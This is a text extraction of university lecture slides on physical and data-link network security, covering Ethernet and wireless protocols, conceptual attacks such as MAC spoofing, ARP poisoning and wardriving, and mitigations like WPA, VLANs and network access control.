Introduction to Network Security Security Chapter 5 Physical - - PDF document

Introduction to Network Security Security

Chapter 5 Physical Network Layer

1

• Dr. Doug Jacobson - Introduction to

Network Security - 2009

Topics

• Lower Layer Security
• Physical Layer Overview
• Common attack methods
• Ethernet
• Ethernet
• Wireless Security
• General Mitigation Methods

2

• Dr. Doug Jacobson - Introduction to

Network Security - 2009

Physical Network Layer

Software Drivers Service Access Points Data buffers Software Upper Layer Digital Data in bytes Digital Data in bytes Medium access Medium Access Protocol Device Interface Hardware Physical Media Physical media specific signal

3

• Dr. Doug Jacobson - Introduction to

Network Security - 2009

Common Attack Methods

• Spoofing
• Sniffing
• Physical Attacks

4

• Dr. Doug Jacobson - Introduction to

Network Security - 2009

Hardware Addressing

D2 D4 D6 HW-D2 HW-D4 HW-D6 R1 R2 D1 D3 D5 D7 Network N1 Network N2 Network N3 HW-D1 HW-R1a HW-R1-b HW-D3 HW-D5 HW-D7 HW-R2a HW-R2b Packet

5

• Dr. Doug Jacobson - Introduction to

Network Security - 2009

Hardware Address Spoofing

Computer 1 HW = A1 Computer 2 HW = C2 Router 1 HW = A2, B1 Router 2 HW = B3, C1 Network A Network C Network B Attacker 1 Attacker 2 Attacker 3 Network A Network C Network B

6

• Dr. Doug Jacobson - Introduction to

Network Security - 2009

Network Sniffing

7

• Dr. Doug Jacobson - Introduction to

Network Security - 2009

Physical Attacks

• Bad network cable
• Network cable loop (both ends plugged

into the same device)

• Bad network controller
• Bad network controller
• Two network controllers with the same

hardware address

8

• Dr. Doug Jacobson - Introduction to

Network Security - 2009

Wired Network Protocols

• Many protocols
• Local Area Networks (LAN)

– Ethernet is the most common

• Wide Area Networks (WAN)
• Wide Area Networks (WAN)

9

• Dr. Doug Jacobson - Introduction to

Network Security - 2009

Ethernet

• Developed in 1973 by Xerox
• Speeds

– 10 Mbps – 100 Mbps – 100 Mbps – 1000 Mbps (gigabit) – 10 Gigabit

10

• Dr. Doug Jacobson - Introduction to

Network Security - 2009

Ethernet Transmission media

Name Cable type Speed Maximum Distance between devices 10Base2 Coax 10 Mbps 185 meters 10BaseF Fiber 10 Mbps 500 meters 10BaseT Twisted Pair 10 Mbps 100 meters 10BaseT Twisted Pair 10 Mbps 100 meters 100BaseT Twisted Pair 100 Mbps 100 meters 100BaseFX Fiber 100 Mbps 1000 meters 1000Base-X Fiber or coax 1000 Mbps Depends on cable type

11

• Dr. Doug Jacobson - Introduction to

Network Security - 2009

Coaxial Ethernet

D4 D3 D2 D1 R1 D7 D6 D5

Packet

12

• Dr. Doug Jacobson - Introduction to

Network Security - 2009

Ethernet Access Method

• CSMA/CD

– Listen – Talk if no one else is talking – Back off if more than one talks at a time – Back off if more than one talks at a time – Minimum packet length is used to guarantee that a collision can be seen by all machines. This also puts a limit on the length of the cable

13

• Dr. Doug Jacobson - Introduction to

Network Security - 2009

Listen quiet Send and Listen Wait Increase N N > 16 Error Packet to send Yes No Yes No Figure 5.5 CSMA/CD Ethernet Protocol Collision Done Send more data Pick Random Number Between 1 and N Packet sent No Yes Yes No

14

• Dr. Doug Jacobson - Introduction to

Network Security - 2009

Ethernet Collision Domain

• The range that is effected when a

collision occurs.

• 10Mbps Ethernet it is 2500 Meters
• This can be changed by using switches
• This can be changed by using switches

and routers (more later)

15

• Dr. Doug Jacobson - Introduction to

Network Security - 2009

Connecting Devices

• Repeater (physical layer only)
• Hub (multi port repeater)
• Bridge (layer 2 only)
• Router (layer 3)
• Router (layer 3)
• Layer 2 switch
• Layer 3 switch

16

• Dr. Doug Jacobson - Introduction to

Network Security - 2009

Ethernet Hubs

Hub Hub Hub C1 Hub C2 C5 C7 C3 C4 C6

17

• Dr. Doug Jacobson - Introduction to

Network Security - 2009

Ethernet switches

• Collisions can slow the network down
• Switches create multiple collision domains
• Typically one machine per leg of the switch
• Switches only pass traffic to the leg of the
• Switches only pass traffic to the leg of the

switch where the destination is located

• Switches reduce the traffic on each leg

– Problem with network monitoring

18

• Dr. Doug Jacobson - Introduction to

Network Security - 2009

Ethernet Switch

Switch 1 Switch 2 Switch 3 Switch 4 C2 C3 C4 C1 P1 P2 P3 P4 P1 P2 P3 P1 P1 P2 P3 Router R1 Switch 4 C5 C7 C6 P2 P3 P4 Port HW Address P1 Uplink P2 C2 P3 Multiple Port HW Address P1 Uplink P2 C5 P3 C6 P4 C7 Port table, switch 2 Port table, switch 4

19

• Dr. Doug Jacobson - Introduction to

Network Security - 2009

Ethernet Tap Points

Switch 1 P1 Tap Spanning or mirrored port Router Hub Monitoring Point Router Switch OR Switch 1 Switch 2 Switch 3 C2 C5 C3 C4 C1 P2 P3 P4 P1 P2 P3 P1 P2 P3 mirrored port Point Switch

20

• Dr. Doug Jacobson - Introduction to

Network Security - 2009

Ethernet - Frame

Preamble (on wire only) 7 bytes Start Frame Delimiter 1 bytes Destination Address 6 Bytes Destination Address 6 Bytes Source Address 6 Bytes Type or Length 2 Bytes Data 46-1500 Bytes FCS 4 Bytes

21

• Dr. Doug Jacobson - Introduction to

Network Security - 2009

Ethernet Addresses

• Goal is to have all addresses globally

unique

• 6 bytes

– Upper 3 bytes vendor code – Upper 3 bytes vendor code – Lower 3 bytes independent

• All 1’s = broadcast address

22

• Dr. Doug Jacobson - Introduction to

Network Security - 2009

Ethernet Type/length

• If value < 0x800 then it is a length field otherwise it is a

protocol type field. Some common types are: Hex

• 0800 DoD Internet Protocol (IP)
• 0800 DoD Internet Protocol (IP)
• 0805 X.25 level 3
• 0806 Address Resolution Protocol (ARP)
• 6003 DECNET Phase IV
• 6004 Dec LAT
• 809B EtherTalk
• 80F3 AppleTalk ARP

23

• Dr. Doug Jacobson - Introduction to

Network Security - 2009

Attacks and vulnerabilities

• Header-based
• Protocol-based
• Authentication-based
• Traffic-based
• Traffic-based

24

• Dr. Doug Jacobson - Introduction to

Network Security - 2009

Header-Based

• Attacks

– Setting the destination address as a broadcast address can cause traffic problems problems – Setting the source can cause switches to get confused

• Mitigation

– Very difficult to mitigate

25

• Dr. Doug Jacobson - Introduction to

Network Security - 2009

Protocol-Based

• Protocol is simple and is in hardware

26

• Dr. Doug Jacobson - Introduction to

Network Security - 2009

Authentication-Based

• You can set the hardware address
• Hardware address is used to

authenticate in switches

• Hardware addresses can be used to
• Hardware addresses can be used to

authenticate devices in a network

27

• Dr. Doug Jacobson - Introduction to

Network Security - 2009

Authentication-Based

• Destination address spoofing
• Destination address is obtained

dynamically via a protocol

• Trick a device into thinking you are the
• Trick a device into thinking you are the

destination (ARP Poisoning)

• No good mitigation method

28

• Dr. Doug Jacobson - Introduction to

Network Security - 2009

ARP Poisoning

D1 Attacker R2 Switch

29

• Dr. Doug Jacobson - Introduction to

Network Security - 2009

Authentication-Based

• Source Address Spoofing
• Source address if not used for

authentication by default

• New security and network management

methods are starting to use the source

• New security and network management

methods are starting to use the source address to authenticate the device. (Network Access Control [NAC])

• More on NAC as a general

countermeasure later

30

• Dr. Doug Jacobson - Introduction to

Network Security - 2009

Traffic-Based

• Attack

– Ethernet controllers can be set in promiscuous mode which enables them to sniff traffic

• Mitigation
• Mitigation

– Encryption, VLAN (more later)

• Broadcast traffic can cause flooding, hard to

flood unless directly connected to the LAN

• No good mitigation for flooding

31

• Dr. Doug Jacobson - Introduction to

Network Security - 2009

Wireless Security Topics

• Standards
• Devices
• Protocol
• Packet Format
• Packet Format
• Vulnerabilities
• Mitigation

32

• Dr. Doug Jacobson - Introduction to

Network Security - 2009

Wireless Standards

Name Frequency Data Rate Max Distance 802.11a 5 GHz 54Mbps 30 meters 802.11b 2.4 GHz 11Mbps 30 meters 802.11g 2.4 GHz 11-54 Mbps 30 meters 802.11n 2.4 GHz 200-500 Mbps 50 meters

33

• Dr. Doug Jacobson - Introduction to

Network Security - 2009

Signal Reflection

34

• Dr. Doug Jacobson - Introduction to

Network Security - 2009

Wireless Ethernet 802.11

• Two topologies

– IBSS Independent Basic Service Set

• Ad-hoc, all stations are peers

– ESS Extended Service Set – ESS Extended Service Set

• AP – Access points connected to a network
• Station plus the AP form a BSS

35

• Dr. Doug Jacobson - Introduction to

Network Security - 2009

Wireless Network Environment

A B C D E Router Switch Access point C SSID = SERVER ROOM Access point A SSID = LAB Access point B SSID = OFFICE

36

• Dr. Doug Jacobson - Introduction to

Network Security - 2009

Discovery and joining

Access Point A Access point B Beacon SSID = LAB Device C Beacon SSID = OFFICE Probe Probe Response SSID = LAB Probe Response SSID = OFFICE Probe Discovery Joining Association Request Association Response 37

• Dr. Doug Jacobson - Introduction to

Network Security - 2009

IEEE 802.11

• CSMA/CA

– Wait till medium is free – Backoff after defer random amount – Exponential backoff for retransmission – Exponential backoff for retransmission – Backoff timer resets if idle – Get an ACK if frame was received correctly

38

• Dr. Doug Jacobson - Introduction to

Network Security - 2009

IEEE 802.11 Protocol

Listen quiet Packet to send No Pick random Number of Got Ack Send Quiet Packet sent No Yes Yes Yes No Time slots Slot count = 0 No Yes Wait a time slot Decrement slot count

39

• Dr. Doug Jacobson - Introduction to

Network Security - 2009

IEEE 802.11 Access Points

Two types

• Extended network

– Access point makes the wireless devices look like they are on the same network as look like they are on the same network as the wired devices

• Wireless router

– Access point acts as a router

40

• Dr. Doug Jacobson - Introduction to

Network Security - 2009

Extended Network

A B C D E Router Switch Network G F

41

• Dr. Doug Jacobson - Introduction to

Network Security - 2009

Wireless Router

A B C Network 1 E D Router Switch Wireless Router Network 1 Network 2 F

42

• Dr. Doug Jacobson - Introduction to

Network Security - 2009

802.11 Frame Format

Frame Control Duration ID Addr 1 Addr 2 Data Seq Control FCS 2 1 6 4 0 - 2312 2 6 Addr 3 Addr 4 6 6 Bytes

• Frame Control: Used to identify the frame type and other

frame specific information.

• Duration/ID: Used to manage the access control protocol.

Address 1: Used to identify the destination of the transmitted packet. This is used by the hardware controller to determine if the frame should be read. If it does not match the address of the controller the remainder of the frame is ignored.

43

• Dr. Doug Jacobson - Introduction to

Network Security - 2009

802.11 Frame Format

• Address 2: Address of the transmitting

device.

• Address 3: Used when the access point is
• Address 3: Used when the access point is

part of an extended network where the access point will relay the traffic.

• Address 4: Used when the access point is

part of an extended network where the access point will relay the traffic

44

• Dr. Doug Jacobson - Introduction to

Network Security - 2009

802.11 Frame Format

• Sequence Control: Used by the

acknowledgement process.

• Data: The data field contains the data. The data

field length is limited to 2312 bytes. Wireless field length is limited to 2312 bytes. Wireless Ethernet does not have a minimum data length.

• Frame Check Sequence (FCS): This field is

used to help verify that the frame has not been corrupted during transmission.

45

• Dr. Doug Jacobson - Introduction to

Network Security - 2009

Header Based

• Setting the destination address as a

broadcast address can cause traffic problems

• Denial of Service
• Denial of Service

– Invalid headers will cause loss of access or loss of association

• Not easy to fix

46

• Dr. Doug Jacobson - Introduction to

Network Security - 2009

Protocol-Based

• Protocol is simple and is in hardware
• Can transmit packets to cause Denial of

service service

• Jamming of signals by ignoring the protocol
• Very hard to stop

47

• Dr. Doug Jacobson - Introduction to

Network Security - 2009

Protocol-Based

• Access point can broadcast its SSID

– Wardriving

• www.wardriving.com
• www.worldwidewardrive.org
• www.worldwidewardrive.org

48

• Dr. Doug Jacobson - Introduction to

Network Security - 2009

Wardriving How easy

• One laptop with wireless
• Free software
• GPS optional

49

• Dr. Doug Jacobson - Introduction to

Network Security - 2009

WarDriving

50

• Dr. Doug Jacobson - Introduction to

Network Security - 2009

Wardriving

Mitigation:

• Do we need to mitigate it?
• Turn off broadcast of SSID
• Use encryption or Network Access
• Use encryption or Network Access

Control (NAC) (make it an authentication problem)

51

• Dr. Doug Jacobson - Introduction to

Network Security - 2009

SSID discovery

• Sometimes additional information is

provided by the SSID that could help an attacker

• Business name
• Business name
• Home address or user’s last name

52

• Dr. Doug Jacobson - Introduction to

Network Security - 2009

Authentication Based

• You can set the hardware address
• Hardware address is used as

authentication in Access Points

• Device authentication
• Device authentication

– Access point authentication – Wireless device authentication

• Access point configuration authentication

– Gaining access to the access point

53

• Dr. Doug Jacobson - Introduction to

Network Security - 2009

Access point Authentication

• Rogue access point

– Installed by valid user

• Fake Access point

– Installed by attacker – Installed by attacker

54

• Dr. Doug Jacobson - Introduction to

Network Security - 2009

Rogue Access Point

Rogue User Attacker / Wardriver Router Switch Internet Rouge Access Point Building Walls 55

• Dr. Doug Jacobson - Introduction to

Network Security - 2009

Rogue Access Point

• Provides access to attacker

– Intentional or unintentional

• Bypasses perimeter security mechanisms
• Bypasses perimeter security mechanisms
• Hard to find and stop

– Scan for SSID – Scan for wireless traffic

• NAC might provide some help.

56

• Dr. Doug Jacobson - Introduction to

Network Security - 2009

Fake Access Point

Wireless User Attacker Router Switch Internet Real Access Point Building Walls Fake Access Point 57

• Dr. Doug Jacobson - Introduction to

Network Security - 2009

Fake Access point

• Hard to fake an access point within an
• rganization.
• Easier if the access point is a public

access point with no encryption. access point with no encryption.

– Not much to be gained by this

58

• Dr. Doug Jacobson - Introduction to

Network Security - 2009

Access Point Configuration Authentication

• Access point are often configured over

the network.

• They have default passwords
• An attacker could change security
• An attacker could change security

settings

59

• Dr. Doug Jacobson - Introduction to

Network Security - 2009

Traffic Based

• Ethernet controllers can be set in

promiscuous mode which enables them to sniff traffic

• Broadcast traffic can cause flooding
• Broadcast traffic can cause flooding

60

• Dr. Doug Jacobson - Introduction to

Network Security - 2009

Wired Equivalent Privacy (WEP)

• Shared keys

– 40 bits – 128 bits

• Can be cracked if enough data is seen
• Can be cracked if enough data is seen
• Aircrack will find a WEP key

61

• Dr. Doug Jacobson - Introduction to

Network Security - 2009

WEP

Password Acknowledge Acknowledge Password Device B Device A Associate Request Associate Response Associate Request Associate Response Authenticate Request Authenticate Request Network Clear Text Traffic Encrypted Traffic with Shared Key Encrypted Traffic with Shared Key 62

• Dr. Doug Jacobson - Introduction to

Network Security - 2009

Wi-Fi Protected Access (WPA)

• Uses 802.1X + Extensible Authentication

Protocol

– Authentication with an auth server – Authentication with an auth server

• Encryption

– Rc4 – AES (WPA2)

63

• Dr. Doug Jacobson - Introduction to

Network Security - 2009

WPA – Home use

• Uses a shared password for

authentication

• If mobile password matches AP then

encryption keys are exchanged encryption keys are exchanged

• New keys for each new association

64

• Dr. Doug Jacobson - Introduction to

Network Security - 2009

Home-Based WPA

Password Acknowledge Negotiate Key Send Password Acknowledge Negotiate Key Password Device B Device A Send Password Associate Request Associate Response Associate Request Associate Response Home Network Clear Text Traffic Encrypted Traffic with Session Key A Negotiate Key Encrypted Traffic with Session Key B Negotiate Key 65

• Dr. Doug Jacobson - Introduction to

Network Security - 2009

WPA – enterprise

• Mobile associates with AP
• Mobile authenticates with auth server

(using 802.1X)

• Authentication server distributes keys to
• Authentication server distributes keys to

AP and mobile

66

• Dr. Doug Jacobson - Introduction to

Network Security - 2009

Enterprise WPA

Password Acknowledge Negotiate Key Negotiate Key Send Password Acknowledge Negotiate Key Negotiate Key Password Device B Device A Send Password Associate Request Associate Response Associate Request Associate Response Enterprise Network Clear Text Traffic Encrypted Traffic with Session Key A Encrypted Traffic with Session Key B Enterprise User Authentication System Password Verification

67

• Dr. Doug Jacobson - Introduction to

Network Security - 2009

Wireless (A world without perimeters)

• Wireless can create a new perimeter

– Know access points – Unknown access points

• Treat your wireless access points the same

as you would any remote access to your as you would any remote access to your network.

– Monitor it – Filter it – Protect it

68

• Dr. Doug Jacobson - Introduction to

Network Security - 2009

Why is Wireless different?

• Most security models are based on a

strong perimeter around an organization

• Wireless signals are not confined to the

walls of an organization walls of an organization

• Wireless technology is plug and play
• Security makes wireless harder to use.

69

• Dr. Doug Jacobson - Introduction to

Network Security - 2009

How to secure your wireless network

• Control your broadcast area
• Enable WEP, use WPA if possible
• Disable SSID Broadcast

– More work to setup clients – More work to setup clients

• Change default AP settings
• Don’t choose descriptive SSID
• Restrict associations to MAC addresses

70

• Dr. Doug Jacobson - Introduction to

Network Security - 2009

General Mitigation Methods

• VLAN
• NAC

71

• Dr. Doug Jacobson - Introduction to

Network Security - 2009

VLAN

• Virtual Local Area Network

– Creates virtual networks where traffic is isolated between each VLAN based on the hardware address hardware address

• Two types

– Static: each port on the switch is part of a VLAN – Dynamic: VLAN assignment is based on hardware address

72

• Dr. Doug Jacobson - Introduction to

Network Security - 2009

VLAN

Router Switch 1 D2 D1 D3 Switch 2 1 2 3 1 2 D4 D5 D6 D7 Switch 3 1 2 VLAN 1 VLAN 2 73

• Dr. Doug Jacobson - Introduction to

Network Security - 2009

Logical View of VLAN

Router Switch D4 D1 D7 VLAN 1 Router Router D5 D6 D3 D2 Switch VLAN 2 Router 74

• Dr. Doug Jacobson - Introduction to

Network Security - 2009

VLAN Security

• A VLAN will separate traffic, but will not

protect devices inside a network from

• ther devices in the same network
• Dynamic VLAN can be fooled by
• Dynamic VLAN can be fooled by

changing the MAC address

• Can help in wireless security

75

• Dr. Doug Jacobson - Introduction to

Network Security - 2009

Wireless VLAN

Router/ Perimeter Defense Wireless VLAN Attacker Router/ Perimeter Defense Switch Internet

76

• Dr. Doug Jacobson - Introduction to

Network Security - 2009

Network Access Control

• Only allow trusted devices on the network
• A host has software that involves an

assessment of the host (virus software, etc.) etc.)

• Hosts asks policy server if it can use the

network

• Network will enforce the policy (limited or

full access)

77

• Dr. Doug Jacobson - Introduction to

Network Security - 2009

NAC Framework

Router/ Perimeter Defense Wireless VLAN Router Perimeter Defense Policy Enforcement Switch / Policy Enforcement Internet Policy Decision Point Authentication System

78

• Dr. Doug Jacobson - Introduction to

Network Security - 2009

NAC

• Limited use today
• Focuses on misconfigured or infected

devices

79

• Dr. Doug Jacobson - Introduction to

Network Security - 2009

Physical Network Security

• Protection methods are limited to local

network

• Provides limited security

80

• Dr. Doug Jacobson - Introduction to

Network Security - 2009